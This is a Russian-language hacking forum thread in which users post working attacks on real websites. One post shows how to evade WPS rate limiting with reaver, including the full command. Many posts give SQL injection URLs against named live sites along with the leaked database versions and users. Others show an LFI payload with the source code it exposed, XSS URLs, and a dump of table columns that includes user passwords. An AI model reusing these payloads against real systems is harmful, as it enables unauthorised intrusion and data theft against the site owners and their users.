Да, тут есть конкурс на безопасность ОС, итд Это + к репе Я стану первым кто сделает это И так мой исследование и авторство Надеюсь маленькие глупенькие не увидят И так расскажу как можно обойти WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking при взломе wi-fi Всё очень просто -T, --m57-timeout=<seconds> -d, --delay=<seconds> -t, --timeout=<seconds> команда примет такой вид reaver -i mon0 -b 00;11;11;11;11;11 -c 12 -vv -m57-timeout=20 --delay=20 --timeout=20 советую в комплексе использовать очень важная команда --delay. Остальные для успокоение души. п.с советую начать не с 20, а с 50 или 100 читайте мануалы к программам, вот что я вам скажу
Не на всех роутерах delay помогает))) TP-Link-и часто в лок уходят после 10 неправильных попыток ввода пина с одного мак-адреса и delay там все равно)
HTML: http://www.towcar.info/read.php?id=-1%20union%20all%20select%20null,null,null,concat%28version%28%29,0x4c7,user%28%29%29,null,null,null,null,null,null-- Версия:4.1.21-standard User:ctrekker@localhost
А этот пойдет? HTML: http://www.sourceisrael.com/read.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT%28version%28%29,0x4c7,user%28%29%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
PHP: http://m.deffki.su/?go= по моему lfi но я не могу раскрутить, если кто подскажет буду признателен
Набранное количество баллов позволяет Вам задавать вопросы по уязвимостям в профильном разделе форума. По поводу вопроса - небольшая подсказка: http://m.deffki.su/?go=php://filter/convert.base64-encode/resource=index PHP: <?php$dl_path = dirname (__FILE__);$root_path = dirname (__FILE__);require_once $dl_path.'/glava/modules/templates.class.php';$tpl = new template;$tpl->dir = $root_path.'/templates/';$tpl->load_template('main.tpl');$go=$_GET[go]; if ($go == "prv") { header("Location: $site_url/prv.php?id=$_GET[id]"); } elseif (!empty($go)) { include "$go.php"; $indek_1=$indek; } else { include "main.php"; } if (empty($descr)){ $descr="<div align=left class=descr_top><strong>Ýðîòèêà</strong> - ýòî òàëàíò êðàñèâî ñ ñåêñóàëüíî ïîêàçàòü æåíñêîå òåëî. Ñ äðóãîé ñòîðîíû, ëþáûå ÷àñòíûå ýðî ôîòî òàê æå ìîæíî íàçâàòü ýðîòèêîé. Îáû÷íûå <strong>ãîëûå äåâóøêè</strong> íà äîìàøíèõ ôîòîãðàôèÿõ ýòî ïðîñòî ýðîòèêà, à êðàñèâî ïîêàçàííûå ãîëûå äåâî÷êè ýòî óæå êðàñèâàÿ, ïðîôåññèîíàëüíàÿ ýðîòèêà. Íà íàøåì ñàéòå âû åæåäíåâíî ìîæåòå íàáëþäàòü è òî è äðóãîå (<strong>áåñïëàòíî</strong>) - ëþáèòåëüñêèå <strong>ôîòî ãîëûõ áàá</strong> è ïðîôåññèîíàëüíûå ôîòîãðàôèè ãîëûõ òåëîê ìîäåëåé. Çàõîäèòå ÊÀÆÄÛÉ ÄÅÍÜ è íàñëàæäàéòåñü ñåêñóàëüíûìè ôîòî ãîëûõ æåíùèí <strong>îíëàéí</strong>!</>";}else{ $descr="<div align=left class=descr_top>$descr</>";}$tpl->set('{main}', $main);$tpl->set('{title}', $title);$tpl->set('{indek}', $indek);$tpl->set('{indek_1}', $indek_1);$tpl->set('{descr}', $descr);$tpl->compile('main');echo $tpl->result['main'];?>
HTML: http://www.coon-coon.com/ViewPhoto.php?Id=9%27%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x56657273696F6E3A3A,version%28%29,0x557365723A3A0D0A,user%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.character_sets%20group%20by%20x%29a%29--%27 Version::5.5.40-0ubuntu0.12.04.1 User:: c31cooncooncom@localhost
http://forum.antichat.ru/threads/21336/page-663#post-2395458 http://forum.antichat.ru/threads/21336/page-607#post-2158662
HTML: http://www.sporte-leisure.com.au/info.php?id=-1%27%20union%20all%20select%20null,concat%280x74696765725F783C62723E3C62723E,0x56657273696F6E3A3A20,version%28%29,0x3C62723E557365723A3A20,user%28%29%29,null,null,null,null--%27 Version:: 5.1.48-community User:: root@localhost
перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так: Google: site:antichat.ru вашсайтсуязвимостью.ру
Господа, требуется написать некий пример, эксплоит с выводом.. а не поле = VULNERABLE и ковычка у параметра.
Code: http://amphora.ru/books.php?pageit=10+procedure+analyse+(extractvalue(1,concat(0x3a,version())),1)-- XPATH syntax error: ':5.5.35-1+wheezy1+mh1-log'
HTML: http://www.pidsphil.org/journal.php?id=40%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT%280x74696765725F783C62723E3C62723E,0x56657273696F6E3A3A20,version%28%29,0x3C62723E557365723A3A20,user%28%29%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Version:: 5.5.32-log User:: [email protected]
Не очень я люблю xss HTML: http://tab.dp.ua/catalog.php?sword=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%32%33%29%3b%3c%2f%73%63%72%69%70%74%3e Ну так же ради юмора HTML: http://tab.dp.ua/catalog.php?sword=%3c%68%31%3e%48%45%4c%4c%4f%3c%2f%68%31%3e нашёл случайно в попытках вставить php код. Там ещё sql есть
HTML: ... ... ,<li>,subscribers,is_active,<li>,temp_keys,session_id,<li>,temp_keys,code,<li>,temp_keys,date,<li>,users,id,<li>,users,user_pass,<li>,users,email,<li>,users,name,<li>,users,company,<li>,users,activity,<li>,users,position,<li>,users,phone,<li>,users,regtime,<li>,users,last_visit_time,<li>,users,last_ip,<li>,users,code,<li>,users,is_blocked,<li>,users,is_active,<li>,users,subscribe,<li>,users_sessions,session_id,<li>,users_sessions,unid,<li>,users_sessions,created_time,<li>,year,id"><img src="/content/upload/event/item/big/zalupa.gif></a><div><a title="bert0ni" imevents_new: :root@localhost" ... ...
HTML: http://www.muziekhuis.nl/details.php?id=-1%20union%20all%20select%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat%280x3C62723E54494745525F583C62723E,0x56657273696F6E3A3A20,version%28%29,0x3C62723E557365723A3A20,user%28%29%29,NULL,NULL,NULL,NULL,NULL Version:: 5.5.43-0+deb7u1 User:: [email protected]
Мои 5 копеек http://www.podarochek .by/about?curCategory=10&curItem=-666+union+select+1,3,user%28%29,5,6,7,8,9,10